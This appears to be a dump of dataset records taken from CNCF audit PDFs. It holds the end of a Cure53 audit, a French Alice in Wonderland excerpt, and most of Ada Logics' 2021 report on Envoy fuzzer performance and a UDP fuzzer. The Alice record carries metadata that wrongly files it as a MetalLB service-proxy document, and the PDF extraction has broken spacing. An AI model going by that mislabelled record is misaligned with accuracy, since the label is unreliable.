Matt Klein and Joshua Marantz from the Envoy\nproxy team as well as Chris Aniszczyk of The Linux Foundation for their excellent project\ncoordination, support and assistance, both before and during this assignment. Special\nthanks need to be extended as well to The Linux Foundation for funding this project.\nCure53, Berlin · 02/27/18 13/13" } ]
{ "category": "Orchestration & Management", "file_name": "Carroll_AliceAuPaysDesMerveilles.pdf", "project_name": "MetalLB", "subcategory": "Service Proxy" }
[ { "data": " \nLewis Carroll \nALICE AU PAYS \nDES MERVEILLES \n(1865 ) \n Édition du groupe « Ebooks libres et gratuits » \n \n \n \n \n \n Table des matières \n \nCHAPITRE I Descente dans le terrier du lapin ................. 4 \nCHAPI TRE II La mare de larmes ................................ ...... 16 \nCHAPITRE III Une course au « Caucus » et une longue \nhistoire ................................ ................................ ................... 28 \nCHAPITRE IV Le lapin fait intervenir le petit Bill .......... 39 \nCHAPITRE V Les conseils de la Chenille ......................... 53 \nCHAPITRE VI Porc et poivre ................................ ............ 68 \nCHAPITRE VII Un thé chez les fous ................................ 87 \nCHAPITRE VIII Le terrain de croquet de la Reine ...... 104 \nCHAPITRE IX H istoire de la Simili -Tortue ................. 121 \nCHAPITRE X Le quadrille des homards ....................... 137 \nCHAPITRE XI Qui a dérobé les tartes ? ....................... 152 \nCHAPITRE XII La déposition d ’Alice ........................... 166 \nÀ propos de cette édition électronique .......................... 180 \n Alice au pays des merveilles - Descente dans le terrier du lapin \n– 4 – CHAPITRE I \nDescente dans le terrier du lapin \nAlice commençait à se sentir très lasse de rester assise à \ncôté de sa sœur , sur le talus , et de n ’avoir rien à faire : une fois \nou deux , elle avait jeté un coup d ’œil sur le livre que lisait sa \nsœur ; mais il ne contenait ni images ni d ialogues : « Et, \npensait Alice , à quoi peut bien servir un livre où il n ’y a ni \nimages ni dialogues ? » \n \n Alice au pays des merveilles - Descente dans le terrier du lapin \n– 5 – \nElle se demandait (dans la mesure où elle était capable de \nréfléchir , car elle se sentait tout endormie et toute stupide à \ncause de la chaleur ) si le plaisir de tresser une guirlande de \npâquerettes valait la peine de se lever et d ’aller cueillir les \npâquerettes , lorsque , brusquement , un Lapin Blanc aux yeux \nroses passa en courant tout près d ’elle. \n \n \n \nCeci n ’avait rien de particulièrement remarquable ; et \nAlice ne trouva pas non plus tellement bizarre d ’entendre le \nLapin se dire à mi -voix : « Oh, mon Dieu ! Oh, mon Dieu ! Je \nvais être en retard ! » (Lorsqu ’elle y réfléchit par la suite , il lui \nvint à l ’esprit qu ’elle aurait dû s ’en étonner , mais , sur l e \nmoment , cela lui sembla tout naturel ) ; cependant , lorsque le \nLapin tira bel et bien une montre de la poche de son gilet , Alice au pays des merveilles - Descente dans le terrier du lapin \n– 6 – regarda l ’heure , et se mit à courir de plus belle , Alice se dressa \nd’un bond , car, tout à coup , l’idée lui était venue qu ’elle \nn’avait jamais vu de lapin pourvu d ’une poche de gilet , ni \nd’une montre à tirer de cette poche . Dévorée de curiosité , elle \ntraversa le champ en courant à sa poursuite , et eut la chance \nd’arriver juste à temps pour le voir s ’enfoncer comme une \nflèche dans un lar ge terrier placé sous la haie . \n \nUn instant plus tard , elle y pénétrait à son tour , sans se \ndemander une seule fois comment diable elle pourrait bien en \nsortir . \n \nLe terrier était d ’abord creusé horizontalement comme \nun tunnel , puis il présentait une pente s i brusque et si raide \nqu’Alice n ’eut même pas le temps de songer à s ’arrêter avant \nde se sentir tomber dans un puits apparemment très profond . \n \nSoit que le puits fût très profond , soit que Alice tombât \ntrès lentement , elle s ’aperçut qu ’elle avait le temps , tout en \ndescendant , de regarder autour d ’elle et de se demander ce \nqui allait se passer . D’abord , elle essaya de regarder en bas \npour voir où elle allait arriver , mais il faisait trop noir pour \nqu’elle pût rien distinguer . Ensuite , elle examina les parois du \npuits , et remarqua qu ’elles étaient garnies de placards et \nd’étagères ; par endroits , des cartes de géographie et des \ntableaux se trouvaient accrochés à des pitons . En passant , elle \nprit un pot sur une étagère ; il portait une étiquette sur \nlaquelle on lisait : MARMELADE D ’ORANGES , mais , à la \ngrande déception d ’Alice , il était vide . Elle ne voulut pas le \nlaisser tomber de peur de tuer quelqu ’un et elle s ’arrangea \npour le poser dans un placard devant lequel elle passait , tout \nen tombant . Alice au pays des merveilles - Descente dans le terrier du lapin \n– 7 – \n \n \n« Ma foi ! songea -t-elle, après une chute pareille , cela me \nsera bien égal , quand je serai à la maison , de dégringoler dans \nl’escalier ! Ce qu ’on va me trouver courageuse ! Ma parole , \nmême si je tombais du haut du toit , je n ’en parlerais à \npersonne ! » (Supposition de s plus vraisemblables , en effet .) \n \nPlus bas , encore plus bas , toujours plus bas . Est-ce que \ncette chute ne finirait jamais ? « Je me demande combien de \nkilomètres j ’ai pu parcourir ? dit-elle à haute voix . Je ne dois \npas être bien loin du centre de la terr e. Voyons : cela ferait " } ]
{ "category": "Orchestration & Management", "file_name": "audit_fuzzer_adalogics_2021.pdf", "project_name": "Envoy", "subcategory": "Service Proxy" }
[ { "data": "Envoy fuzzing improvements\n,\nApril 2021\nEnvoy fuzzing improvements\npresented by\nin collaboration with\nA u t h o r s\nDavid Korczynski\n<\ndavid@adalogics.com\n>\nAdam Korczynski\n<\nadam@adalogics.com\n>\nDate: 29th april, 2021\nThis report is licensed under Creative Commons 4.0\n(CC BY 4.0)\nAda Logics\nLondon, United Kingdom\n1\nEnvoy fuzzing improvements\n,\nApril 2021\nTable of Contents\nExecutive summary\n3\n1 Envoy fuzzing optimisations\n4\n1.1 Background on how coverage collection in libFuzzer\nworks.\n4\n1.1 is it possible to disable certain 8-bit counters?\n6\n1.2 How does coverage instrumentation impact fuzzer\nexecution speed in Envoy?\n7\n1.2.1 Execution speed of an empty fuzzer.\n7\n1.2.2 Using Prodfiler to observe the impact.\n9\n1.2.3 Using fuzzer instrumentation to assess the overall\ntime spent with fuzzing.\n10\n1.2.4 Counting the number of 8-bit inline counters\nin each Envoy fuzzer.\n11\n1.2.5 Conclusions\n12\n1.3 Improving Envoy fuzzer execution by reducing instrumentation\n13\n1.3.1 Disabling instrumentation\n13\n1.3.2 Results from disabling instrumentation\n14\nMeasuring different configurations\n14\nDeploying on OSS-Fuzz.\n15\n2 Fuzzing the Envoy UdpListener\n16\n3 Future advice\n18\n4 Conclusions\n19\n5 Appendix\n20\nA.0 Disassembly of empty fuzzers\n20\nA.1 Build configurations\n22\nA.2 Envoy UDP fuzzer coverage\n26\nAda Logics\nLondon, United Kingdom\n2\nEnvoy fuzzing improvements\n,\nApril 2021\nExecutive summary\nIn this engagement we performed two tasks. The first\nwas optimising the performance of\nend-to-end fuzzers and the second was developing a\nfuzzer for the UDP listener code of\nEnvoy.\nRegarding optimisation, we find that the cause of\nperformance issues in the end-to-end\nfuzzers is due to the large amount of code that is\ninstrumented for coverage-guiding the\nEnvoy fuzzers. Specifically, the Envoy fuzzers run\nwith a large amount of inline 8-bit\ncounters which is a counter inserted by\nSanitizerCoverage\non every edge of the target\napplication. libFuzzer uses the counters by iterating\nthrough all of the counters after each\nfuzz iteration in order to measure code coverage.\nThus, the more counters there are, the\nmore effort libFuzzer has to spend iterating through\nall counters on each fuzz iteration. We\nshow how this impacts Envoy performance in four different\nways:\n1.\nThe exact same empty fuzzer compiled with fuzzer instrumentation\nruns 419 times\nslower when also compiled with Envoy instrumentation.\n2.\nThe h2_capture_persistent_fuzz_test fuzzer spends\nonly 20% of the actual execution\ninside LLVMFuzzerTestOneInput.\n3.\nProfilers reveal an excessive amount of time is spent\ninside coverage-collection\ncode.\n4.\nThe end-to-end fuzzers contain around 1.2 million\ninline 8-bit counters, which is huge\nin comparison to other fuzzers, e.g. Lua fuzzers contain\n6000 inline 8-bit counters.\nWe show how limiting the coverage instrumentation\nimproves fuzzer performance and\nobserve the same effect on OSS-Fuzz statistics.\nRegarding UDP fuzzing, we develop a UDP fuzzer that\ntargets the code requested by the\nEnvoy team, namely handleReadCallback. We demonstrate\ncode coverage by observing the\ntarget code in OSS-Fuzz reports, and also demonstrates\nthat the fuzzer catches the DOS\nissue previously reported.\nIn this report we go through both of these tasks and\nspend considerable detail on the\ncoverage instrumentation part.\nAda Logics\nLondon, United Kingdom\n3\nEnvoy fuzzing improvements\n,\nApril 2021\n1 Envoy fuzzing optimisations\nThe goal of this task was to improve performance of\nthe end-to-end fuzzers of Envoy. In this\nsection we go through how we achieved this by first giving background information on how\nlibFuzzer uses coverage instrumentation, then we proceed\nto show how this instrumentation\naffects the Envoy fuzzers, and finally we show how\nto improve the performance of the\nfuzzers by reducing instrumentation.\nExecutive summary:\nThe instrumentation of Envoy has a significant slowdown\nof fuzzer execution. For example, a\nfuzzer with a single branch runs 419 times slower\nwith Envoy instrumentation than without.\nLimiting the amount of instrumentation used in the\nEnvoy project shows to increase\nperformance of the fuzzers. This has been added to\nthe OSS-Fuzz build of Envoy, which has\nshown to increase performance on the OSS-Fuzz logs.\nThere is future work for the Envoy\nmaintainers on refining the instrumentation of the\nfuzzers.\n1.1 Background on how coverage collection in libFuzzer\nworks.\nIn this section we outline how libFuzzer uses coverage\ninstrumentation to track fuzzer\nprogress. This is not related to Envoy explicitly,\nhowever, the content described in this\nsection gives an improved understanding as to why\nthe Envoy fuzzers lack performance.\nIn the LLVM source code, the file llvm-project/compiler-rt/lib/fuzzer/FuzzerTracePC.cpp\ncontains the logic for tracing coverage. At the bottom\nof this file you find a set of functions:\nvoid__sanitizer_cov_trace_pc_guard(uint32_t*Guard)void__sanitizer_cov_trace_pc()void__sanitizer_cov_trace_pc_guard_init(uint32_t*Start,uint32_t*Stop)void__sanitizer_cov_8bit_counters_init(uint8_t*Start,uint8_t*Stop)void__sanitizer_cov_pcs_init(constuintptr_t*pcs_beg,constuintptr_t*pcs_end)void__sanitizer_cov_trace_pc_indir(uintptr_tCallee)void__sanitizer_cov_trace_cmp8(uint64_tArg1,uint64_tArg2)void__sanitizer_cov_trace_const_cmp8(uint64_tArg1,uint64_tArg2)void__sanitizer_cov_trace_cmp4(uint32_tArg1,uint32_tArg2)void__sanitizer_cov_trace_const_cmp4(uint32_tArg1,uint32_tArg2)void__sanitizer_cov_trace_cmp2(uint16_tArg1,uint16_tArg2)void__sanitizer_cov_trace_const_cmp2(uint16_tArg1,uint16_tArg2)void__sanitizer_cov_trace_cmp1(uint8_tArg1,uint8_tArg2)void__sanitizer_cov_trace_const_cmp1(uint8_tArg1,uint8_tArg2)void__sanitizer_cov_trace_switch(uint64_tVal,uint64_t*Cases)void__sanitizer_cov_trace_div4(uint32_tVal)void__sanitizer_cov_trace_div8(uint64_tVal)void__sanitizer_cov_trace_gep(uintptr_tIdx)\nThese are all callbacks that SanitizerCoverage uses\n(\nhttps://clang.llvm.org/docs/SanitizerCoverage.html#id2\n)\nand from a high level perspective\nthe callbacks are used to track execution of code,\ne.g. basic blocks, in the target. One of the\nAda Logics\nLondon, United Kingdom\n4\nEnvoy fuzzing improvements\n,\nApril 2021\nimportant callback functions is__sanitizer_cov_8bit_counters_init\nwhich is described\nhere\nhttps://clang.llvm.org/docs/SanitizerCoverage.html#inline-8bit-counters\n.\nThis callback is\nused during fuzzing compilation and instructs the\ncompiler to insert inline counter increments\non every code edge. The idea is then that these counters\ncan be used to track how many\ntimes an edge was hit during execution.\nThe way libFuzzer uses these 8bit-counters is by iterating\nthrough all of them, i.e. iteration\nthrough a sequence of counters corresponding to the\nnumber of edges in the target\napplication, after each fuzz iteration in order to\ndetermine if new coverage has been\nachieved.\nIn theRunOne\nfunction inside the FuzzerLoop.cpp\n(\nhttps://github.com/llvm/llvm-project/blob/28ab7ff2d732fb0580486baa02b1383a72cec0cb/co\nmpiler-rt/lib/fuzzer/FuzzerLoop.cpp#L506\n) source we\nobserve the following code:\nExecuteCallback(Data, Size);autoTimeOfUnit = duration_cast<microseconds>(UnitStopTime- UnitStartTime);\nUniqFeatureSetTmp.clear();size_tFoundUniqFeaturesOfII =0;size_tNumUpdatesBefore = Corpus.NumFeatureUpdates();TPC.CollectFeatures([&](uint32_tFeature) {if(Corpus.AddFeature(Feature,static_cast<uint32_t>(Size),Options.Shrink))UniqFeatureSetTmp.push_back(Feature);if(Options.Entropic)Corpus.UpdateFeatureFrequency(II, Feature);if(Options.ReduceInputs && II && !II->NeverReduce)if(std::binary_search(II->UniqFeatureSet.begin(),II->UniqFeatureSet.end(),Feature))FoundUniqFeaturesOfII++;});\nThis code snippet has two purposes. First, to runExecuteCallback\nwhich calls into the\nfuzzing entry point function (LLVMFuzzerTestOneInput\n).\nSecond,\nto gather the code coverage of the target follow the\nfuzzer’s single execution, which\nis done byTPC.CollectFeatures\n. TheTPC.CollectFeatures\ncode begins as follows:\ntemplate<classCallback> //voidCallback(uint32_tFeature)ATTRIBUTE_NO_SANITIZE_ADDRESSATTRIBUTE_NOINLINEsize_tTracePC::CollectFeatures(Callback HandleFeature)const{autoHandle8bitCounter = [&](size_tFirstFeature,size_tIdx,uint8_tCounter) {if(UseCounters)HandleFeature(static_cast<uint32_t>(FirstFeature+ Idx *8+CounterToFeature(Counter)));elseHandleFeature(static_cast<uint32_t>(FirstFeature+ Idx));};\nAda Logics\nLondon, United Kingdom\n5\nEnvoy fuzzing improvements\n,\nApril 2021\nsize_tFirstFeature =0;\nfor(size_ti =0; i < NumModules; i++) {for(size_tr =0; r < Modules[i].NumRegions;r++) {if(!Modules[i].Regions[r].Enabled)continue;FirstFeature +=8* ForEachNonZeroByte(Modules[i].Regions[r].Start,Modules[i].Regions[r].Stop,FirstFeature,Handle8bitCounter);}}\nThe nested for loop calls intoForEachNonZeroByte\nwith two pointers as the first\ntwo arguments. These arguments point to the areas\nin the code where a page of\ninline 8-bit counters exist, namely, each region in\ntheModules\nvector encapsulates\na page of 8bit counters. The implementation ofForEachNonZeroByte\nis defined here\nhttps://github.com/llvm/llvm-project/blob/e60d6e91e196d91a1b9bfcc93d9f43946ea29299/co\nmpiler-rt/lib/fuzzer/FuzzerTracePC.h#L184\nand essentially\nthe function will call the callback\n(Handle8bitCounter\n) for each nonzero byte in the memory\nregion. In the case of theRunOne\nfunction the result is to call into the function\nprovided by the call toTPC.CollectFeatures\n, which eventually calls into\nvarious functions related to the corpus,\ne.g.Corpus.AddFeature\nandCorpus.UpdateFeatureFrequency\nwhich will trigger\nchanges in the Corpus representation if the features\nindicate that a new piece of code has\nbeen executed.\nThe main point to get across in the above section\nis that nested for-loop inCollectFeatures\niterates through the regions with\ninline 8-bit counters, and what we will\nobserve in the Envoy fuzzers is that the number of\ninline 8-bit counters is significantly large.\n1.1 is it possible to disable certain 8-bit counters?\nA question that is relevant about how libFuzzer uses\nthe instrumentation is whether you can\ntell libFuzzer to disable checking of inline counters.\nIndeed, in theTPC.CollectFeatures\nfunction the loop that is extensive (shown above),\nnamely:\nfor(size_ti =0; i < NumModules; i++) {for(size_tr =0; r < Modules[i].NumRegions;r++) {if(!Modules[i].Regions[r].Enabled)continue;FirstFeature +=8* ForEachNonZeroByte(Modules[i].Regions[r].Start,Modules[i].Regions[r].Stop,FirstFeature,Handle8bitCounter);}}\nonly iterates through the inline 8-bit counters if\na given region is “Enabled\n”. Unfortunately,\ntheEnabled\nboolean will always be true for all regions\nas all regions are initialised to true\nAda Logics\nLondon, United Kingdom\n6\nEnvoy fuzzing improvements\n,\nApril 2021\n(\nhttps://github.com/llvm/llvm-project/blob/ab5823867c4aee7f3e02ddfaa217905c87471bf9/co\nmpiler-rt/lib/fuzzer/FuzzerTracePC.cpp#L59\n) and never\nset to false.\n1.2 How does coverage instrumentation impact fuzzer\nexecution speed in Envoy?\nIn this section we show three different ways of observing\nthe impact of the current\ninstrumentation set up in Envoy.\n1.2.1 Execution speed of an empty fuzzer.\nWe assess the slowdown of the instrumentation by creating\nthe simplest fuzzer we can. We\ndo this by having an empty fuzzer and compiling it\nin two different ways. First, we compile it\nwithout linking it to any Envoy code. Second, we compile\nit in the exact same way ash2_capture_fuzz\nnamely by linking it to the exact\nsame code in the Envoy code base,\nwhich corresponds to essentially all of the Envoy\ncode. We define the new fuzzer as follows:\n#include \"test/integration/h2_fuzz.h\"DEFINE_FUZZER(constuint8_t* buf,size_tlen) {if(len ==1234123412) {std::cout<<\"hello \"<< buf <<\"\\n\";}}\nand enable it by extending test/integration/BUILD\nwith the following\nenvoy_cc_fuzz_test(name =\"h2_empty_fuzz_test\",srcs = [\"h2_empty_fuzz_test.cc\"],copts = [\"-DPERSISTENT_FUZZER\"],corpus =\"h2_corpus\",deps = [\":h2_fuzz_persistent_lib\"],)\nWe then compile and run the fuzzer, and observe the\nfollowing output:\n$ h2_empty_fuzz_testINFO: Running with entropic power schedule (0xFF,100).INFO: Seed: 2391912932INFO: Loaded 1 modules (1282530 inline 8-bit counters):1282530 [0xa51f110,0xa6582f2),INFO: Loaded 1 PC tables (1282530 PCs): 1282530 [0xa6582f8,0xb9ea118),INFO: -max_len is not provided; libFuzzer will notgenerate inputs larger than 4096bytesINFO: A corpus is not provided, starting from an emptycorpus#2 INITED cov: 3 ft: 4 corp: 1/1b exec/s: 0 rss:170Mb\nAda Logics\nLondon, United Kingdom\n7\nEnvoy fuzzing improvements\n,\nApril 2021\n#8192 pulse cov: 3 ft: 4 corp: 1/1b lim: 80 exec/s: 4096 rss: 170Mb#16384 pulse cov: 3 ft: 4 corp: 1/1b lim: 163 exec/s:4096 rss: 171Mb#32768 pulse cov: 3 ft: 4 corp: 1/1b lim: 325 exec/s:4096 rss: 172Mb#65536 pulse cov: 3 ft: 4 corp: 1/1b lim: 652 exec/s:3855 rss: 175Mb\nIf we create the same empty fuzzer but outside the\nenvoy build environment but following the\nEnvoy fuzzer set up\nhttps://github.com/envoyproxy/envoy/blob/1d1b708c7bf6efa02c41d9ce22cbf1e4a1aeec2c/te\nst/fuzz/fuzz_runner.h#L71\n:\n#include <iostream>\n#define DEFINE_TEST_ONE_INPUT_IMPL\\extern \"C\" int LLVMFuzzerTestOneInput(const uint8_t*data, size_t size) { \\EnvoyTestOneInput(data, size);\\return 0;\\}\n#define DEFINE_FUZZER\\static void EnvoyTestOneInput(const uint8_t* buf,size_t len); \\DEFINE_TEST_ONE_INPUT_IMPL\\static void EnvoyTestOneInput\nDEFINE_FUZZER(const uint8_t* buf, size_t len) {if (len ==1234123412) {std::cout<<\"hello \"<< buf <<\"\\n\";}}\nand run the fuzzer, then we observe the output:\n$ $CXX $CXXFLAGS $LIB_FUZZING_ENGINE ./empty_fuzzer.cc$ ./a.outINFO: Running with entropic power schedule (0xFF,100).INFO: Seed: 1703773772INFO: Loaded 1 modules (126 inline 8-bit counters):126 [0x84c0f8, 0x84c176),INFO: Loaded 1 PC tables (126 PCs): 126 [0x5e6398,0x5e6b78),INFO: -max_len is not provided; libFuzzer will notgenerate inputs larger than 4096bytesINFO: A corpus is not provided, starting from an emptycorpus#2 INITED cov: 3 ft: 4 corp: 1/1b exec/s: 0 rss:29Mb#4194304 pulse cov: 3 ft: 4 corp: 1/1b lim:4096 exec/s: 2097152 rss: 343Mb#8388608 pulse cov: 3 ft: 4 corp: 1/1b lim:4096 exec/s: 1677721 rss: 611Mb#16777216 pulse cov: 3 ft: 4 corp: 1/1b lim:4096 exec/s: 1677721 rss: 614Mb\nWe verify the disassembly ofLLVMFuzzerTestOneInput\nis similar in both of the fuzzers (see\nAppendix A.0), specifically that they each execute\nthe same amount of code in theLLVMFuzzerTestOneInput\n. We also note here that the\ncoverage achieved by both fuzzers\nis equal (namely 3) as shown by the output of libFuzzer.\nAda Logics\nLondon, United Kingdom\n8\nEnvoy fuzzing improvements\n,\nApril 2021\nThe execution speed and the number of inline 8-bit\ncounters are very different in the two\ncases. Specifically, we extract two important conclusions\nfrom the above observations\n1.\nThe fuzzer that is compiled outside of the Envoy fuzzer\nenvironment executes with\nroughly 1.67 million executions per second, whereas\nthe one in the Envoy\nenvironment executes with roughly 4000 executions\nper second. The envoy\ninstrumentation slows down the fuzzer by roughly 419x.\n2.\nThe number of inline 8-bit counters in the Envoy fuzzer\nis 1282530 whereas it is 126\nin the empty fuzzer (these numbers can be observed\nby the output from LibFuzzer\ngiven above). This corresponds to iterating through\n126 bytes versus 1282530 bytes\nafter each fuzz iteration.\n1.2.2 Using Prodfiler to observe the impact.\nAnother way we tried to assess the execution speed\nof the fuzzers was by using profiling\ntools to tell us where execution is spent. To do this,\nwe relied on Prodfiler\nhttps://github.com/optimyze/prodfiler-documentation\nto profile the entire machine in which we\nran the fuzzer. Prodfiler reported that 25.8% of all\nfunction samples observed happened\ninside theForEachNonZeroByte\nfunction\n.\nIn addition\nto this, looking at the flame graphs\nprovided by Prodfiler we see that around 19% of the\nentire machine execution was spent\ninside of theCollectFeatures\nfunction.\nAda Logics\nLondon, United Kingdom\n9\nEnvoy fuzzing improvements\n,\nApril 2021\n1.2.3 Using fuzzer instrumentation to assess the overall\ntime spent with\nfuzzing.\nAnother thing we were interested in understanding\nwas how much of the fuzzing execution\nwas actually spent in the target and how much was\nspent in the fuzzing engine itself. To do\nthis, we added some simple instrumentation to the\nh2_capture_fuzz.cc and h2_fuzz.cc files,\nsuch that the h2_capture_fuzz fuzzer will log timestamps\nas follows:\nDEFINE_PROTO_FUZZER(..H2CaptureFuzzTestCase input)ADD_TIME_STAMP(F1)H2FuzzIntegrationTest h2_var;h2_var.replay(input)--> H2FuzzIntegrationTest::replay(... H2CaptureFuzzTestCase&input,)...ADD_TIME_STAMP(R4)IntegrationTcpClientPtr tcp_client = makeTcpConnection(lookupPort(\"http\"));...ADD_TIME_STAMP(R5)for (int i =0; i < input.events().size();++i) {if (stop_further_inputs) {break;}INC_GLOBAL(PACKET_COUNT)// send packet}// endloopADD_TIME_STAMP(R6)...<--ADD_TIME_STAMP(F2)<--\nWith these timestamps available we set up an experiment\nto measure the following metrics:\nAda Logics\nLondon, United Kingdom\n10\nEnvoy fuzzing improvements\n,\nApril 2021\n-\nTotal time spent fuzzing\n-\nTotal time spent in code between the following timestamps:\n-\nF1-F2: This is the total time spent in the fuzzer\ncode.\n-\nR4-R6: This is the total time spent in the replay\nfunction.\n-\nR5-R6: This is the total time spent in the loop sending\nfuzz inputs to the client\n-\nNumber of total fuzz inputs to the client\n-\nVarious proportionate metrics, e.g. inputs sent to\nthe client.\nWe executed\nh2_capture_persistent_fuzz\nwith the seeds\nprovided, and observed the\nfollowing results:\nMetric\nResult\nTotal execution time\n1200 sec\nF1-F2\n244 sec\nR4-R6\n239 sec\nR5-R6\n226 sec\nF1-F2/Total time\n20%\nR4-R6/Total time\n19.9%\nR5-R6/Total time\n18.8%\nTotal number of client fuzz inputs\n82797\nTotal fuzz inputs to client / (F1-F2)\n339 inputs/sec\nTotal fuzz inputs to client / (R4-R6)\n346 inputs/sec\nTotal fuzz inputs to client / (R5-R6)\n366 inputs/sec\nTotal number of fuzz iterations\n27761\nWe observe that only 20% of the fuzz time is spent\nin the actual fuzzing code, and thus 80%\nof the time is spent in the libFuzzer engine.\n1.2.4 Counting the number of 8-bit inline counters\nin each Envoy fuzzer.\nFinally, we wanted to understand how many 8-bit inline\ncounters are actually used by the\nEnvoy fuzzers. This number is reported by the fuzzers\nwhen they are initiated, so the only\nthing we have to do in this case is build the fuzzers,\nlaunch them and then count the number\nof inline 8-bit counters. We do this using a build\nwith AddressSanitizer, and we see the\nfollowing results:\nFuzzer name\ninline 8-bit counters\nh2_capture_persistent_fuzz_test\n1281655\nh2_capture_fuzz_test\n1281649\nAda Logics\nLondon, United Kingdom\n11\nEnvoy fuzzing improvements\n,\nApril 2021\nh1_capture_fuzz_test\n1268160\nh1_capture_persistent_fuzz_test\n1268166\ncodec_fuzz_test\n1030067\nhash_fuzz_test\n570594\nget_sha_256_digest_fuzz_test\n579995\nevaluator_fuzz_test\n1100639\ndns_filter_fuzz_test\n1139928\nFor comparison purposes the following table gives\nexamples of 8-bit counters in various\nopen source projects that we have fuzzed.\nProject fuzzer targets\nInline 8-bit counters\nLua\n6322\nPugiXML\n4871\nLevelDB\n5948\nRocksDB\n137913\nIt is clear that the number of inline 8-bit counters\nin Envoy is significantly larger than any of\nthe other projects. For example, our fuzzer targeted\nthe core library (liblua.a) for the Lua\nprogramming language has a total of 6322 inline 8-bit\ncounters whereas the h2 end-to-end\nEnvoy fuzzer has a total of 1.2 million.\n1.2.5 Conclusions\nThe instrumentation set up in Envoy is a significant\nperformance bottleneck for the fuzzers.\nThe main reason for the performance is the post-processing\nthat occurs after each fuzz\nexecution in terms of collecting coverage features\nto assess whether the execution\ndiscovered new code execution. An empty fuzzer without\nEnvoy instrumentation runs 419x\nfaster than an empty fuzzer with Envoy instrumentation.\nWe want to emphasize here that the fuzzing infrastructure\nof Envoy is of high quality and the\nteam behind it has shown high competencies in fuzzing\nEnvoy. In fact, from a certain\nperspective it is positive that Envoy builds all code\nrelated to Envoy with sanitizers and this\nshould be considered a great achievement as well as\nhaving the right intentions. It is due to\nthe sheer amount of code in the resulting Envoy binaries,\nwhich is due to linking of many\nthird-party libraries in addition to the large Envoy\ncode base in and of itself, that the\ncoverage collection ends up having a significant slowdown.\nIn the vast majority of projects\nwe would not advise limiting the coverage instrumentation\nacross a fuzzing set up.\nAda Logics\nLondon, United Kingdom\n12\nEnvoy fuzzing improvements\n,\nApril 2021\nFurthermore, the observations we made in this section are not common knowledge and it is\nnot to be expected from non-fuzzing experts to consider\nthis during fuzzer development.\n1.3 Improving Envoy fuzzer execution by reducing\ninstrumentation\n1.3.1 Disabling instrumentation\nThe crucial task for improving fuzzing performance\nin Envoy is to reduce the amount of\ncoverage instrumentation in the target application.\nSpecifically, the goal is to reduce the\namount of inline 8-bit counters. The main way to this\nis by including the compilation flags:\n-fsanitize-coverage=0-fno-sanitize=all\nThe first flag-fsanitize-coverage=0\ndisablescoverage\ninstrumentation, whereas the\nsecond flag also disables bug-finding sanitizers,\ne.g. AddressSanitizer. The first flag should\nbe removed from code that can avoid being explored\nor are potentially fuzzed elsewhere.\nThe second flag, namely disabling bug-finding sanitizers,\nshould be disabled with more care.\nIn order to disable instrumentation, we tried three\nthings:\nBazel builds:\nFirst, we tried controlling instrumentation\ndetails inside of the Envoy BUILD\nscripts. In particular, adding `copts` definitions\nto various places in the BUILD scripts of\nENVOY. This works for the majority of bazel rules,\nhowever, it does not work for any rule\ndefined by way ofproto_library\n. This is becauseproto_library\ndoes not allow us to\npropagate compilation options to the protobuf compiler,\nand thus it does not allow us to\ninclude the flags to disable instrumentation on a\nper-target basis. We reference to issues in\nthe bazelbuild/rules_proto repository here:\nhttps://github.com/bazelbuild/rules_proto/issues/85\nhttps://github.com/bazelbuild/rules_proto/issues/41\nPassing flags to clang:\nSecond, we tried using the\n`--per_file_copt\n` command line\noption for bazel builds. This option accepts a regular\nexpression that encapsulates a set of\nfiles used during compilation as well as a string\nthat will be passed to the compiler during\ncompilation of files that match the regular expression.\nFor example, the following line:\n--per_file_copt=^.*\\.pb\\.cc$@-fsanitize-coverage=0,-fno-sanitize=all\nwill pass the flags-fsanitizer-coverage=0\nand-fno-sanitize=all\nto all files compiled\nin the bazel build with.pb.cc\nextensions. This option\nworked well.\nAda Logics\nLondon, United Kingdom\n13\nEnvoy fuzzing improvements\n,\nApril 2021\nUsing a blocklist for SanitizerCoverage\n: Third, using the-fsanitize-coverage-blocklist=/src/block_list.txt\nalso by way ofper_file_copt\n. This option disables coverage instrumentation\nbased on contents of the file/src/block_list.txt\nin which it is possible to disable\ninstrumentation based on file names\nor (mangled) function names.\n1.3.2 Results from disabling instrumentation\nMeasuring dif ferent configurations\nThe next was to identify which parts of the code yields\nbest results when disabling coverage\ninstrumentation. To do this, we set up a set of different\nbuild configurations following the\napproaches (2 and 3) described above and measured\nthe following data:\n1.\nThe number of 8-bit inline counters in the h1 e2e\nand h2 2e2 fuzzers;\n2.\nThe total number of fuzz iterations achieved over\na 5 minute run with the seeds from\nthe OSS-Fuzz repository.\nIn total, we compiled the Envoy fuzzers with 6 different\nconfigurations and the configurations\nare shown in Appendix A.1. The following table shows\nthe results.\nFuzzer\nSetting\ninline 8-bit \ncounters\nTotal execs \n(300 sec)\nExec/sec\nhttp2 e2e\nConfiguration 1 \n(regular build)\n1281922\n4527\n15.1\nhttp1 e2e\nConfiguration 1 \n(regular build)\n1268433\n7123\n23.7\nhttp2 e2e\nConfiguration 2\n271239\n7372\n24.6\nhttp1 e2e\nConfiguration 2\n272107\n25370\n84.6\nhttp2 e2e\nConfiguration 3\n313473\n6864\n22.9\nhttp1 e2e\nConfiguration 3\n314363\n17640\n58.9\nhttp2 e2e\nConfiguration 4\n313545\n5291\n17.6\nhttp1 e2e\nConfiguration 4\n314438\n16530\n55.1\nhttp2 e2e\nConfiguration 5\n258955\n6522\n21.7\nhttp1 e2e\nConfiguration 5\n259216\n20639\n68.8\nhttp2 e2e\nConfiguration 6 \n(includes \nblocked list of \nfunctions)\n273673\n8055\n26.85\nhttp1 e2e\nConfiguration 6\n274564\n19932\n66.4\nAda Logics\nLondon, United Kingdom\n14\nEnvoy fuzzing improvements\n,\nApril 2021\n(includes \nblocked list of \nfunctions)\nFinally, we note that the executions per second increases\nif the fuzzer is run for a longer\nperiod of time. For example, in our experiments we\nhave observed above 100 exec/sec in\nthe http2 end-to-end fuzzer with seeds in longer fuzz\nruns. The data of these runs have been\nshared with the Envoy team internally.\nDeploying on OSS-Fuzz.\nWe integrated some of the above efforts into the OSS-Fuzz\nbuild script of Envoy and the\nfollowing figure shows impact.\nWe can see here that a performance improvement happened\non the 16th April 2021.\nInspecting the logs, we notice on the 15th April the\namount of inline 8-bit counters was\n~600,000\n(\nhttps://console.cloud.google.com/storage/browser/_details/envoy-logs.clusterfuzz-external.a\nppspot.com/libFuzzer_envoy_h2_capture_persistent_fuzz_test/libfuzzer_asan_envoy/2021-\n04-15/00:06:53:330737.log\n) whereas on the 16th April\nit was 